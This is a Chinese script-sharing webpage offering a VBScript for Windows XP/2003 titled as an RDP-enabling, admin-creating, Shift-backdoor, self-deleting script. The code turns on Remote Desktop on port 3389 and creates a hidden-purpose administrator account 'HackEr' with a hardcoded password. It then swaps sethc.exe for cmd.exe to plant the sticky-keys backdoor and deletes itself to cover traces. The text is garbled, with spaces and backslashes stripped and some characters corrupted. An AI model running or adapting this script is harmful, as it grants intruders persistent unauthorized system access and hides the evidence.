手机
当前位置:查字典教程网 >脚本专栏 >vbs >xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs
xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs
摘要:复制代码代码如下:onerrorresumenextconstHKEY_LOCAL_MACHINE=&H80000002strCompute...

复制代码 代码如下:

onerrorresumenext

constHKEY_LOCAL_MACHINE=&H80000002

strComputer="."

SetStdOut=WScript.StdOut

SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!"&_

strComputer&"rootdefault:StdRegProv")

strKeyPath="SYSTEMCurrentControlSetControlTerminalServer"

oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath

strKeyPath="SYSTEMCurrentControlSetControlTerminalServerWdsrdpwdTdstcp"

oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath

strKeyPath="SYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp"

strKeyPath="SYSTEMCurrentControlSetControlTerminalServer"

strValueName="fDenyTSConnections"

dwValue=0

oReg.SetDWORDValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

strKeyPath="SYSTEMCurrentControlSetControlTerminalServerWdsrdpwdTdstcp"

strValueName="PortNumber"

dwValue=3389

oReg.SetDWORDValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

strKeyPath="SYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp"

strValueName="PortNumber"

dwValue=3389

oReg.SetDWORDValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

onerrorresumenext

dimusername,password:IfWscript.Arguments.CountThen:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":endif:setwsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Setob=GetObject(os):Setoe=GetObject(os&"/Administrators,group"):Setod=ob.Create("user",username):od.SetPasswordpassword:od.SetInfo:Setof=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echoof.ADsPath

OnErrorResumeNext

Dimobj,success

Setobj=CreateObject("WScript.Shell")

success=obj.run("cmd/ctakeown/f%SystemRoot%system32sethc.exe&echoy|cacls%SystemRoot%system32sethc.exe/G%USERNAME%:F©%SystemRoot%system32cmd.exe%SystemRoot%system32acmd.exe©%SystemRoot%system32sethc.exe%SystemRoot%system32asethc.exe&del%SystemRoot%system32sethc.exe&ren%SystemRoot%system32acmd.exesethc.exe",0,True)

CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

【xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs】相关文章:

vbscript禁用 启用fso的方法

打开QQ并且让它自己输入用户名和密码的vbs脚本

用vbs实现修改dns的网关脚本

管理网卡vbs脚本

VBS中的SetLocale函数到底有什么用?

vbs整人代码大集合 多年的代码收集

将HTML或txt文件转换为ASP输出的vbs代码

利用sql语句复制一条或多条记录

IE浏览器增加“复制图像地址”的右键菜单的vbs代码

简单的VBS加密实现代码

精品推荐
分类导航